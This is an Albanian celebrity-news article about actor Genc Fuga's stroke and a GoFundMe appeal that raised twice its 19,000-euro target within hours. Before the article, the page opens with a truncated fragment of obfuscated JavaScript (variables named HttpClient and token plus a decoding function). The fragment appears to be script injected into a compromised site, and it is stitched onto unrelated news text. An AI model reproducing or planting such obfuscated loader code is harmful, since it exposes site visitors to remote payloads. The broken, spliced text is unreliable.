;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Për dy orë mblidhet dyfishi i shumës së nevojshme për aktorin Fuga

By

Mbrëmë u bë e ditur se aktori i njohur shqiptar Genc Fuga po kalon një problem serioz shëndetësor.

Ishte bashkëshortja e tij, Eni ajo që përmes një postimi në Facebook zbuloi se Fuga ka pësuar një sulm në tru dhe për këtë, i duhet ndihma që të paguhet operacioni në një spital privat.

Ajo i kërkoi punëtorëve të RTSH të kontribuojnë me nga 200 lek por ka marrë ndihmën e mijëra shqiptarëve.

Në një thirrje ‘GoFund’ për vetëm dy-tre orë, është mbledhur dyfishi i shumës së kërkuar prej 19,000 eurosh.

Thirrjes i janë bashkëngjitur shumë fytyra publike.

Ndër donacionet më të mëdha rangohen Bora Zemani e Gentjan Zenelaj me nga 500 euro, Holta Dulaku (producentë e pronare e Vizion Plus) poashtu me aq, Olta Daku, Turjan Hysko, Monika Lubonja me nga 200 euro e të tjerë.

Përmes një postimi, Eni ka falënderuar të gjithë që në kohë rekord mblodhën shumën e nevojshme.

‘Falenderoj me zemer se pari ekipin e spitalit Amerikan per perkushtimin dhe profesionalizmin. Faleminderoj cdo njerin nga ju per suportin dhe mbeshtetjen, per cdo fjale dhe kontribut.Shuma u sigurua. Faleminderit nga zemra perseri!’, është shprehur ajo.

Urojmë që Genci të bëhet mirë sa më shpejt. /Prive.al

Artikuj të ngjashëm